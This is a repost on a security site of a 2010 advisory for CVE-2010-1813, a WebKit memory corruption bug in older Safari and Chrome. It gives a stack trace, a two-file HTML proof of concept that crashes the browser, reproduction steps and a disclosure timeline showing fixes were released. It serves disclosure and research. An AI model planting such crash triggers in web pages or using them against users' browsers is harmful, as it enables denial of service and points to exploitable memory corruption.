首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) Memory Corrupt
来源:vfocus.net 作者:Vazquez 发布时间:2010-09-13  

TITLE: WEBKIT (APPLE SAFARI < 4.1.2/5.0.2 & GOOGLE CHROME < 5.0.375.125) MEMORY CORRUPTION VULNERABILITY
TESTED OS: WINDOWS XP SP3
SEVERITY: HIGH
CVE-NUMBER: CVE-2010-1813
DISCOVERED DATE: 2010-06-29
FIXED DATE: GOOGLE CHROME (2010-07-26) & APPLE SAFARI (2010-09-08)
FIXED VERSIONS: GOOGLE CHROME 5.0.375.125 & APPLE SAFARI 4.1.2/5.0.2
DISCOVERED BY: JOSE A. VAZQUEZ

======ABOUT APPLICATION======

"WebKit is an open source web browser engine. WebKit is also the name of the Mac OS X system framework version
of the engine that's used by Safari, Dashboard, Mail, and many other OS X applications. WebKit's HTML and
JavaScript code began as a branch of the KHTML and KJS libraries from KDE..." copied from http://webkit.org/

======DESCRIPTION======

A memory corruption vulnerability was confirmed by Chromium Security Team. Original stacktrace showed a null ptr
dereference, but some pointers were also corrupted.

Stacktrace (using Chrome symbols):

WebCore::RenderObject::containingBlock()  Line 597
WebCore::RenderBlock::paintContinuationOutlines()  Line 2344
WebCore::RenderBlock::paintObject()  Line 2232
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2447
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebCore::RenderWidget::paint()  Line 281
WebCore::InlineBox::paint()  Line 180
WebCore::InlineFlowBox::paint()  Line 682
WebCore::RootInlineBox::paint()  Line 167
WebCore::RenderLineBoxList::paint()  Line 219
WebCore::RenderBlock::paintContents()  Line 2090
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderBlock::paintChildren()  Line 2127
WebCore::RenderBlock::paintContents()  Line 2092
WebCore::RenderBlock::paintObject()  Line 2199
WebCore::RenderBlock::paint()  Line 1980
WebCore::RenderLayer::paintLayer()  Line 2445
WebCore::RenderLayer::paintList()  Line 2499
WebCore::RenderLayer::paintLayer()  Line 2468
WebCore::RenderLayer::paint()  Line 2252
WebCore::FrameView::paintContents()  Line 1943
WebCore::ScrollView::paint()  Line 797
WebKit::WebFrameImpl::paintWithContext()  Line 1795
WebKit::WebFrameImpl::paint()  Line 1818
WebKit::WebViewImpl::paint()  Line 979
RenderWidget::PaintRect()  Line 390
RenderWidget::DoDeferredUpdate()  Line 501
RenderWidget::CallDoDeferredUpdate()  Line 428


======PROOF OF CONCEPT======

File 1.html:

<meta http-equiv="refresh" content="1;URL=1.html" >
<iframe src="2.html"></iframe>

File 2.html:

<dialog style='position:relative'>
 <h style='outline-style:auto'>X<div></div></h>
</dialog>


======STEPS TO REPRODUCE======

1.- Upload 1.html and 2.html to your server.
2.- Open file 1.html with vulnerable app.

-Google Chrome:

3.- Wait for a while, then, crash is got (sad-tab).

-Apple Safari:

3.- Wait for a while, if crash is not got, use Ctrl+T to trigger it.
 


======REFERENCES======

[ref-1] -> https://bugs.webkit.org/show_bug.cgi?id=41373
[ref-2] -> http://googlechromereleases.blogspot.com/2010/07/stable-channel-update_26.html
[ref-3] -> http://support.apple.com/kb/HT4334
[ref-4] -> http://spa-s3c.blogspot.com/2010/09/full-responsible-disclosurewebkit-apple.html


======DISCLOSURE TIMELINE======

Standard Time Zone: GMT/UTC + 01:00 hour (Spain/Madrid)

[2010-06-29] => Posted new issue in Chromium Project (with pocs).
[2010-06-29] => Chromium confirmed memory corruption and opened new webkit bug.
[2010-07-26] => Chromium released new fix (Google Chrome 5.0.375.125).
[2010-09-08] => Apple released new fix (Apple Safari 4.1.2/5.0.2).
[2010-09-10] => Public disclosure.


======CREDITS=======

Jose Antonio Vazquez Gonzalez,
Telecom. Engineer & Sec. Researcher.
http://spa-s3c.blogspot.com/


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Excel RTD Memory Corruption
·Microsoft Office Word 2007 spr
·YOPS Web Server Remote Command
·Adobe Acrobat and Reader "push
·Wordpress 3.0.1 - Remote Denia
·QK SMTP Server 3 RCPT TO: Comm
·Dmx Ready v2 lite Database Dis
·Prevx DLL preloading exploit
·BlogItDL Database Disclosure E
·Beta Asp - Anket Database Disc
·Kingsoft Antivirus <= 2010.04.
·Safari v5.0.1 DLL Hijacking (s
  推荐广告
CopyRight © 2002-2020 VFocuS.Net All Rights Reserved